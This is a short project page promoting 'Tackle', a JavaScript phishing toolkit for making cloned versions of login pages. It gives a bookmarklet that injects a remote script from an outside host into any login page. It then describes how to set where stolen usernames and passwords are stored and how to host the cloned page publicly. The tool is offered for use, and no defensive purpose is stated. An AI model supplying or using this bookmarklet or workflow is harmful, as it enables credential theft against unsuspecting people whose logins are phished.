Tackle
Javascript phishing toolkit to create phished version of login pages.
Tackle is a simple, easy to use, Javascript phishing page creator. To use Tackle, copy paste the followingscript above in the address bar while viewing any login page.

javascript:(function(){var x = document.createElement("script");x.id = "phishJS";x.src = "http://n.parashuram.googlepages.com/Tackle.js";document.body.appendChild(x);})()


When you activate tackle, a dialog appears on the login page. Using the various options, you can configure the location where you want the credentials (username, password, etc.) to be stored. You will have to copy the HTML code in the text box and host it at a hosting provider to make the phishing page available to the world. You can also add the code as a bookmark. Currently, you can create phished version of the pages only using Firefox. The phished pages will however work in most browsers.


Other projects